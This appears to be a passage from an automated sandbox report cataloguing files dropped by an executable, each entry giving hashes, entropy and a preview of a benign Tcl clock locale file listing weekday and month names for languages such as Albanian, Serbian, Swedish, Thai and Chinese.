                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sq DAYS_OF_WEEK_ABBREV [list \.. "Die"\.. "H\u00ebn"\.. "Mar"\.. "M\u00ebr"\.. "Enj"\.. "Pre"\.. "Sht"].. ::msgcat::mcset sq DAYS_OF_WEEK_FULL [list \.. "e diel"\.. "e h\u00ebn\u00eb"\.. "e mart\u00eb"\.. "e m\u00ebrkur\u00eb"\.. "e enjte"\.. "e premte"\.. "e shtun\u00eb"].. ::msgcat::mcset sq MONTHS_ABBREV [list \.. "Jan"\.. "Shk"\.. "Mar"\.. "Pri"\.. "Maj"\.. "Qer"\.. "Kor"\.. "Gsh"\.. "Sht"\.. "Tet"\.. "N\u00ebn"\.. "Dhj"\.. ""].. ::msgcat::mcset sq MONTHS_FULL [list \.. "janar"\.. "shkurt"\.. "mars"\.. "prill"\.. "maj"\.. "qershor"\.. "korrik"\.. "gusht"\.. "shtator"\.. "tetor"\.. "n\u00ebntor"\.. "dhjetor"\.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2087
                                                                                                                                                                                                                              Entropy (8bit):4.307749748884122
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43ilQTSBQrQP9QenzMKSFD9NI/QiNQEQrQL1KKYjU5rtAx:2I5EyLMKSFZNIYMzYMKKiqW
                                                                                                                                                                                                                              MD5:BF363AB60B57F6D8FDCDBFD230A28DDF
                                                                                                                                                                                                                              SHA1:6375CBA0A2197DA7E65BEE45C42F02C4F0B9142D
                                                                                                                                                                                                                              SHA-256:FA00A7B22C9941F6C2B893F22B703DCB159CA2F2E4005FD6A74A632AEB786BFA
                                                                                                                                                                                                                              SHA-512:91AD8085EF321A5A0E4D2ED204940CB66E8E230BBEDE59A8A07D1CEED9155FCC6B075A1FCC44AE834C1FEEEB3A59256C4310684C5AC453D4C50DFABD88469814
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sr DAYS_OF_WEEK_ABBREV [list \.. "\u041d\u0435\u0434"\.. "\u041f\u043e\u043d"\.. "\u0423\u0442\u043e"\.. "\u0421\u0440\u0435"\.. "\u0427\u0435\u0442"\.. "\u041f\u0435\u0442"\.. "\u0421\u0443\u0431"].. ::msgcat::mcset sr DAYS_OF_WEEK_FULL [list \.. "\u041d\u0435\u0434\u0435\u0459\u0430"\.. "\u041f\u043e\u043d\u0435\u0434\u0435\u0459\u0430\u043a"\.. "\u0423\u0442\u043e\u0440\u0430\u043a"\.. "\u0421\u0440\u0435\u0434\u0430"\.. "\u0427\u0435\u0442\u0432\u0440\u0442\u0430\u043a"\.. "\u041f\u0435\u0442\u0430\u043a"\.. "\u0421\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset sr MONTHS_ABBREV [list \.. "\u0408\u0430\u043d"\.. "\u0424\u0435\u0431"\.. "\u041c\u0430\u0440"\.. "\u0410\u043f\u0440"\.. "\u041c\u0430\u0458"\.. "\u0408\u0443\u043d"\.. "\
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1219
                                                                                                                                                                                                                              Entropy (8bit):4.3542418837714285
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83qoLt6yLQoAusrIsmZ5m4AcjTHX92WFfjr4MvBvX:43ZLxQNusrr4Aw3Jkq1X
                                                                                                                                                                                                                              MD5:3B5C3FFA0829768470BDA1B46D882060
                                                                                                                                                                                                                              SHA1:C96799036EC5CCDE799A6B50CD7748908935A2F3
                                                                                                                                                                                                                              SHA-256:483916B51BD7E071E88F9EC36AAF3E08FEA823991532F832DE491C6C40B55A9F
                                                                                                                                                                                                                              SHA-512:684FA249123878AA7F856DF0FD3B0D9F041113CFEA8EEFA47D0E1948DA23694330BF0D62BA896A3891CD559C16CAE9330BF31508F530AC003D2929D5FD9246D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sv DAYS_OF_WEEK_ABBREV [list \.. "s\u00f6"\.. "m\u00e5"\.. "ti"\.. "on"\.. "to"\.. "fr"\.. "l\u00f6"].. ::msgcat::mcset sv DAYS_OF_WEEK_FULL [list \.. "s\u00f6ndag"\.. "m\u00e5ndag"\.. "tisdag"\.. "onsdag"\.. "torsdag"\.. "fredag"\.. "l\u00f6rdag"].. ::msgcat::mcset sv MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "aug"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset sv MONTHS_FULL [list \.. "januari"\.. "februari"\.. "mars"\.. "april"\.. "maj"\.. "juni"\.. "juli"\.. "augusti"\.. "september"\.. "oktober"\.. "november"\.. "december"\.. ""].. ::msgcat:
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1040
                                                                                                                                                                                                                              Entropy (8bit):4.108744949579904
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383A4mScvhkzoR4mtuWckRkoay3UVxMmALfG7IdzVJ633xRCPLMYMvYo76u:4aR83/Shkz1uckO76kMmEf62qOTdMvvn
                                                                                                                                                                                                                              MD5:5774860C8AEECBD48F1502E616158CAB
                                                                                                                                                                                                                              SHA1:DE7059713EA7913A0C79F5386833CE2BCAD2CFD7
                                                                                                                                                                                                                              SHA-256:1DA068C9AA02EF14A2440758C6040D632D96044A20EC501DBB9E40D8592E0E7F
                                                                                                                                                                                                                              SHA-512:91E69222DDF55E9E0E389DB77D7A0F2E082351DC3FB34A1A2C1E350E4187E8BB940F6C2EDE1B8651159C2787AA0BE4D7268F33F7A82CAED03514FCE462530408
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset sw DAYS_OF_WEEK_ABBREV [list \.. "Jpi"\.. "Jtt"\.. "Jnn"\.. "Jtn"\.. "Alh"\.. "Iju"\.. "Jmo"].. ::msgcat::mcset sw DAYS_OF_WEEK_FULL [list \.. "Jumapili"\.. "Jumatatu"\.. "Jumanne"\.. "Jumatano"\.. "Alhamisi"\.. "Ijumaa"\.. "Jumamosi"].. ::msgcat::mcset sw MONTHS_ABBREV [list \.. "Jan"\.. "Feb"\.. "Mar"\.. "Apr"\.. "Mei"\.. "Jun"\.. "Jul"\.. "Ago"\.. "Sep"\.. "Okt"\.. "Nov"\.. "Des"\.. ""].. ::msgcat::mcset sw MONTHS_FULL [list \.. "Januari"\.. "Februari"\.. "Machi"\.. "Aprili"\.. "Mei"\.. "Juni"\.. "Julai"\.. "Agosti"\.. "Septemba"\.. "Oktoba"\.. "Novemba"\.. "Desemba"\.. ""].. ::msgcat::mcset sw BCE "
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1874
                                                                                                                                                                                                                              Entropy (8bit):4.080580566597515
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83AI0xnJdnQhmHlHYPKtul+eOPfIxyH5ztUSLu8tptLtrl+eOPfIxyH5ztUSU:43N0dQmHlHYPKtu1HxMtr1Hx/
                                                                                                                                                                                                                              MD5:85288236C3997302EA26D7403BBA2C15
                                                                                                                                                                                                                              SHA1:05AB389CC4DCF17B37BFF6ED1ECD58D6E9850A01
                                                                                                                                                                                                                              SHA-256:AEFDC4255890D5B3FFE5CEE1B457B7D711283C2287ABA644155C10956012F6C1
                                                                                                                                                                                                                              SHA-512:8E389D46606176EE14B8356153095B49C9426B80139B672A620F488891F091D1A272D4FB116775900E4AB4EC84DDDEBD8D6AF81AC672F14F148F2BFC638D2B10
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta DAYS_OF_WEEK_FULL [list \.. "\u0b9e\u0bbe\u0baf\u0bbf\u0bb1\u0bc1"\.. "\u0ba4\u0bbf\u0b99\u0bcd\u0b95\u0bb3\u0bcd"\.. "\u0b9a\u0bc6\u0bb5\u0bcd\u0bb5\u0bbe\u0baf\u0bcd"\.. "\u0baa\u0bc1\u0ba4\u0ba9\u0bcd"\.. "\u0bb5\u0bbf\u0baf\u0bbe\u0bb4\u0ba9\u0bcd"\.. "\u0bb5\u0bc6\u0bb3\u0bcd\u0bb3\u0bbf"\.. "\u0b9a\u0ba9\u0bbf"].. ::msgcat::mcset ta MONTHS_ABBREV [list \.. "\u0b9c\u0ba9\u0bb5\u0bb0\u0bbf"\.. "\u0baa\u0bc6\u0baa\u0bcd\u0bb0\u0bb5\u0bb0\u0bbf"\.. "\u0bae\u0bbe\u0bb0\u0bcd\u0b9a\u0bcd"\.. "\u0b8f\u0baa\u0bcd\u0bb0\u0bb2\u0bcd"\.. "\u0bae\u0bc7"\.. "\u0b9c\u0bc2\u0ba9\u0bcd"\.. "\u0b9c\u0bc2\u0bb2\u0bc8"\.. "\u0b86\u0b95\u0bb8\u0bcd\u0b9f\u0bcd"\.. "\u0b9a\u0bc6\u0baa\u0bcd\u0b9f\u0bae\u0bcd\u0baa\u0bb0\u0bcd"\.. "\u0b85\u0b95\u0bcd\u0b9f\u0bcb\u0baa\u0bb0\u0bcd"\.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257
                                                                                                                                                                                                                              Entropy (8bit):4.863003494480733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xosDv+IZosK3v6ry/5osDo+3v+6f6HyFvn:4EnLB383ZDvl5K3v6ry/ZDF3vmSVn
                                                                                                                                                                                                                              MD5:CF078352DA0507C767F04E31D6C14296
                                                                                                                                                                                                                              SHA1:0A9B1255BD85B60D3620AE61370F54748AB7A182
                                                                                                                                                                                                                              SHA-256:4978A193076DE56944236F7F1DCECACFF739536DFB3DBEFC1F7FE2B97A8AEAF4
                                                                                                                                                                                                                              SHA-512:6FFC85B2A8DECB373EC76B1CD1A9459A30E443319F2C8DB9BBE6E115F5EFEEBAC314D4E8BE996EA55EE46466C6F6057A73078F5FDCF1C4CBAF1A270E45BC10C0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset ta_IN DATE_FORMAT "%d %M %Y".. ::msgcat::mcset ta_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset ta_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2149
                                                                                                                                                                                                                              Entropy (8bit):4.097884113767283
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43a8mxI9k3JR0UjjFbPcniLHVktjjFbPcniLHVM:2a8v9k3JdbPcIidbPcIG
                                                                                                                                                                                                                              MD5:61E4CB2AAD66285E9113071057F39C35
                                                                                                                                                                                                                              SHA1:A2BD21090859669C4B6A875E077825381B7E2702
                                                                                                                                                                                                                              SHA-256:9E96C7123100234A7018533764502985A208F2EB3314F5B6332D46016725A63F
                                                                                                                                                                                                                              SHA-512:589A2D65508B07B5FDEDA883F71A4B496B25458CA1ECE7C4D4F5DAE82EB683DA82C8E21E57D63A235AB600174C9D362A746B2E27BAA6E3ADE1B7BD9D6000BE27
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te DAYS_OF_WEEK_ABBREV [list \.. "\u0c06\u0c26\u0c3f"\.. "\u0c38\u0c4b\u0c2e"\.. "\u0c2e\u0c02\u0c17\u0c33"\.. "\u0c2c\u0c41\u0c27"\.. "\u0c17\u0c41\u0c30\u0c41"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30"\.. "\u0c36\u0c28\u0c3f"].. ::msgcat::mcset te DAYS_OF_WEEK_FULL [list \.. "\u0c06\u0c26\u0c3f\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c38\u0c4b\u0c2e\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2e\u0c02\u0c17\u0c33\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c2c\u0c41\u0c27\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c17\u0c41\u0c30\u0c41\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c41\u0c15\u0c4d\u0c30\u0c35\u0c3e\u0c30\u0c02"\.. "\u0c36\u0c28\u0c3f\u0c35\u0c3e\u0c30\u0c02"].. ::msgcat::mcset te MONTHS_ABBREV [list \.. "\u0c1c\u0c28\u0c35\u0c30\u0c3f"\.. "\u0c2b\u0c3f\u0c2c\u0c4d\u0c30\u0c35\u0c30\u0c3f"\.. "\u0c2e\u0c3
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):419
                                                                                                                                                                                                                              Entropy (8bit):5.058324650031252
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:4EnLB383LjZWsn0sHjoD0savzda3v6ry/ZF3vMSVn:4aR833Z1nnHjoDnavzd8vSCZNvMSV
                                                                                                                                                                                                                              MD5:BCA040A356E7E8CC597EFB9B9065F8E1
                                                                                                                                                                                                                              SHA1:ADAF7EC8C2035BC06E168D3F1BD7F39277E9273F
                                                                                                                                                                                                                              SHA-256:B110FEEDDA21ECCEFA624BEF8E1476E9F221FB253880AC370967AE4D0237CA7A
                                                                                                                                                                                                                              SHA-512:D408ECE8CF89FB23B45420D3CBA7655EEE713498210889A84EE25D3417360705546D97028EAAAA47764B6E9B0A3699669B98C0A53861A38E0DFCB9F3B8A47BEC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset te_IN AM "\u0c2a\u0c42\u0c30\u0c4d\u0c35\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN PM "\u0c05\u0c2a\u0c30\u0c3e\u0c39\u0c4d\u0c28".. ::msgcat::mcset te_IN DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset te_IN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset te_IN DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2359
                                                                                                                                                                                                                              Entropy (8bit):4.382796122808316
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:439X4QKPQJecQwFA0P9JmDsxQ7KHfWkD2CQM0DnWxFDzCYmdrtVP:29ohCi1028QmHfIC4jW3DmHB
                                                                                                                                                                                                                              MD5:7F61E1EA256D78948189EF07119663CD
                                                                                                                                                                                                                              SHA1:6867E9780049FACE9984B7788B6F362B8D1AD718
                                                                                                                                                                                                                              SHA-256:48BEAF693BF5B6EED15234DB0D375B97E6D576A749E9048420C153E6CAFC0259
                                                                                                                                                                                                                              SHA-512:F3E24E0B41A7D722AC2FA0E429A2DCB1CCB5BAECC9912ADF6AF79C51366EA1AC9F931F0F44F068F3CEE6873516E6223CC5E7616CF523B1DFB9E528DE4D58454A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset th DAYS_OF_WEEK_ABBREV [list \.. "\u0e2d\u0e32."\.. "\u0e08."\.. "\u0e2d."\.. "\u0e1e."\.. "\u0e1e\u0e24."\.. "\u0e28."\.. "\u0e2a."].. ::msgcat::mcset th DAYS_OF_WEEK_FULL [list \.. "\u0e27\u0e31\u0e19\u0e2d\u0e32\u0e17\u0e34\u0e15\u0e22\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e08\u0e31\u0e19\u0e17\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e2d\u0e31\u0e07\u0e04\u0e32\u0e23"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e38\u0e18"\.. "\u0e27\u0e31\u0e19\u0e1e\u0e24\u0e2b\u0e31\u0e2a\u0e1a\u0e14\u0e35"\.. "\u0e27\u0e31\u0e19\u0e28\u0e38\u0e01\u0e23\u0e4c"\.. "\u0e27\u0e31\u0e19\u0e40\u0e2a\u0e32\u0e23\u0e4c"].. ::msgcat::mcset th MONTHS_ABBREV [list \.. "\u0e21.\u0e04."\.. "\u0e01.\u0e1e."\.. "\u0e21\u0e35.\u0e04."\.. "\u0e40\u0e21.\u0e22."\.. "\u0e1e.\u0e04."\.. "\u0e21\u0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1183
                                                                                                                                                                                                                              Entropy (8bit):4.390397293529625
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR83ZVUflVdq4qTr6dyX59508THHCh5LbQgWiNv9KvWIn:43PXTtbTngLhWiJGWIn
                                                                                                                                                                                                                              MD5:017F0F989BD5DBBF25E7C797CE09C45C
                                                                                                                                                                                                                              SHA1:162922DBD55A31A74410375A36EE7BC50E092BDD
                                                                                                                                                                                                                              SHA-256:4B85B345D6C43F7257C6849A60A492397FD5FD9D82DF3A2252189D7A1ECCBB64
                                                                                                                                                                                                                              SHA-512:73B6CF395753D863330687404E8A584CB08B81A8CC456DCE7BB49C4EA15EA19E45E3CC1E1367E10915DE14AC6258383289BCFEF55AD2768A50889DF390D37EF9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset tr DAYS_OF_WEEK_ABBREV [list \.. "Paz"\.. "Pzt"\.. "Sal"\.. "\u00c7ar"\.. "Per"\.. "Cum"\.. "Cmt"].. ::msgcat::mcset tr DAYS_OF_WEEK_FULL [list \.. "Pazar"\.. "Pazartesi"\.. "Sal\u0131"\.. "\u00c7ar\u015famba"\.. "Per\u015fembe"\.. "Cuma"\.. "Cumartesi"].. ::msgcat::mcset tr MONTHS_ABBREV [list \.. "Oca"\.. "\u015eub"\.. "Mar"\.. "Nis"\.. "May"\.. "Haz"\.. "Tem"\.. "A\u011fu"\.. "Eyl"\.. "Eki"\.. "Kas"\.. "Ara"\.. ""].. ::msgcat::mcset tr MONTHS_FULL [list \.. "Ocak"\.. "\u015eubat"\.. "Mart"\.. "Nisan"\.. "May\u0131s"\.. "Haziran"\.. "Temmuz"\.. "A\u011fustos"\.. "Eyl\u00fcl"\.. "Ekim"\.. "Kas\u0131m"\.. "Aral\u
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2165
                                                                                                                                                                                                                              Entropy (8bit):4.289021158621493
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:436yILgoQjQPxUIkgPDRQnQ0vVQbC1iQwweIgWQDIoZI7QDI3QbI87IVQnIzQ7mh:2AzUe3EhV8CYgrbH7z3fLVTzgn5jyX7p
                                                                                                                                                                                                                              MD5:323BD95809A44B0BADC71AD36E5F095B
                                                                                                                                                                                                                              SHA1:44F6016873CA955D27545C56CCD24BDB06A83C43
                                                                                                                                                                                                                              SHA-256:7093DA7E39CEB6D3F51EB6CF1CCA2D7F3680ED7B8FE4A5F0CECEEF6BEB21AC77
                                                                                                                                                                                                                              SHA-512:DB16E0E2D17CE47673DE781A7171944C14CC550FB8EB0920C05B979E4D067E36DF0B59B8BFA81F82D8FCE1FFDDAAD2755E68BFE5BC0DBB11E8716A4D18BA5F7E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset uk DAYS_OF_WEEK_ABBREV [list \.. "\u043d\u0434"\.. "\u043f\u043d"\.. "\u0432\u0442"\.. "\u0441\u0440"\.. "\u0447\u0442"\.. "\u043f\u0442"\.. "\u0441\u0431"].. ::msgcat::mcset uk DAYS_OF_WEEK_FULL [list \.. "\u043d\u0435\u0434\u0456\u043b\u044f"\.. "\u043f\u043e\u043d\u0435\u0434\u0456\u043b\u043e\u043a"\.. "\u0432\u0456\u0432\u0442\u043e\u0440\u043e\u043a"\.. "\u0441\u0435\u0440\u0435\u0434\u0430"\.. "\u0447\u0435\u0442\u0432\u0435\u0440"\.. "\u043f'\u044f\u0442\u043d\u0438\u0446\u044f"\.. "\u0441\u0443\u0431\u043e\u0442\u0430"].. ::msgcat::mcset uk MONTHS_ABBREV [list \.. "\u0441\u0456\u0447"\.. "\u043b\u044e\u0442"\.. "\u0431\u0435\u0440"\.. "\u043a\u0432\u0456\u0442"\.. "\u0442\u0440\u0430\u0432"\.. "\u0447\u0435\u0440\u0432"\.. "\u043b
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1471
                                                                                                                                                                                                                              Entropy (8bit):4.44729506678271
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:4aR836DNjYTP55YAUy2tJ9kyzW68IFYHMBSW1K1pvhv1O:43dbYJyC8ySgI1dV1O
                                                                                                                                                                                                                              MD5:C127F54C462917D3B3EEF5F29F612138
                                                                                                                                                                                                                              SHA1:B1D9A67F856D93F98524C6372B352EA0DE1B9CD3
                                                                                                                                                                                                                              SHA-256:E9B7AECD456F1D2288604C982B5DED0DCF71DCA968C0B0EAFF4CA16CC3B73EC2
                                                                                                                                                                                                                              SHA-512:0B0F132F10580751258D37E070338C3B39DF57FDECDB9D0AFA67E90D6766DDCB4D711876E551ED759D177F1B8F4E9E1DD8F7899F7CB57F8039F55EC4C2984E87
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset vi DAYS_OF_WEEK_ABBREV [list \.. "Th 2"\.. "Th 3"\.. "Th 4"\.. "Th 5"\.. "Th 6"\.. "Th 7"\.. "CN"].. ::msgcat::mcset vi DAYS_OF_WEEK_FULL [list \.. "Th\u01b0\u0301 hai"\.. "Th\u01b0\u0301 ba"\.. "Th\u01b0\u0301 t\u01b0"\.. "Th\u01b0\u0301 n\u0103m"\.. "Th\u01b0\u0301 s\u00e1u"\.. "Th\u01b0\u0301 ba\u0309y"\.. "Chu\u0309 nh\u00e2\u0323t"].. ::msgcat::mcset vi MONTHS_ABBREV [list \.. "Thg 1"\.. "Thg 2"\.. "Thg 3"\.. "Thg 4"\.. "Thg 5"\.. "Thg 6"\.. "Thg 7"\.. "Thg 8"\.. "Thg 9"\.. "Thg 10"\.. "Thg 11"\.. "Thg 12"\.. ""].. ::msgcat::mcset vi MONTHS_FULL [list \.. "Th\u00e1ng m\u00f4\u0323t"\.. "Th\u00e1ng hai"\.. "Th\u00e1ng ba"\.. "Th\u00e1ng t\u01b0"\.. "Th\u00e
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1598), with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3385
                                                                                                                                                                                                                              Entropy (8bit):4.5164095151631125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:43qrY2BBT7uxDqwPqDa8c3FLbYmhyvMDKbW0YGLuoEyke2gdr:2yPTKdo
                                                                                                                                                                                                                              MD5:2F356DE14D48B1091DEAA32D20C38D96
                                                                                                                                                                                                                              SHA1:4AB78D47A73290000955A7C1DFDF7106093F69FD
                                                                                                                                                                                                                              SHA-256:EB247F5184A59414D3DF7E3ECA51F5998C248CFB27D2C02E62A7A30AB35197A7
                                                                                                                                                                                                                              SHA-512:602410830018B455C68AE2EBDD83BA561CF59DA5898E00C80CE7EF619912E591EB38B4C8FE8D9B1F024E7105B0C4D2D326FC855F31E79C1B954429B947DFFBB1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \.. "\u661f\u671f\u65e5"\.. "\u661f\u671f\u4e00"\.. "\u661f\u671f\u4e8c"\.. "\u661f\u671f\u4e09"\.. "\u661f\u671f\u56db"\.. "\u661f\u671f\u4e94"\.. "\u661f\u671f\u516d"].. ::msgcat::mcset zh MONTHS_ABBREV [list \.. "\u4e00\u6708"\.. "\u4e8c\u6708"\.. "\u4e09\u6708"\.. "\u56db\u6708"\.. "\u4e94\u6708"\.. "\u516d\u6708"\.. "\u4e03\u6708"\.. "\u516b\u6708"\.. "\u4e5d\u6708"\.. "\u5341\u6708"\.. "\u5341\u4e00\u6708"\.. "\u5341\u4e8c\u6708"\.. ""].. ::msgcat::m
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):319
                                                                                                                                                                                                                              Entropy (8bit):5.167825099880243
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSyEtJLl73oo6d3/xoX5YBoHJ+3vtfNrsoHJ+3v6MYBoXa+3vYq9vn:4EnLB383U5YMJ+3vtN3J+3v6LcL3vYqN
                                                                                                                                                                                                                              MD5:9FCDC2E80E13984D434E3CC91E1ED14C
                                                                                                                                                                                                                              SHA1:710D9EE2A71021F4AB609886138EED43C1380ACD
                                                                                                                                                                                                                              SHA-256:4C8A855700FEFE8EE21B08030FF4159D8011AE50353F063229C42DE6292475CF
                                                                                                                                                                                                                              SHA-512:D899A1F58DF1051BB2C2C4AC859C52A2D19B1593C37022A29439B37A8057ADC3941F3564E2E1D9CEB72AE123A4E12E24C3736343AA3A5EC8749AB5AEBBF65085
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
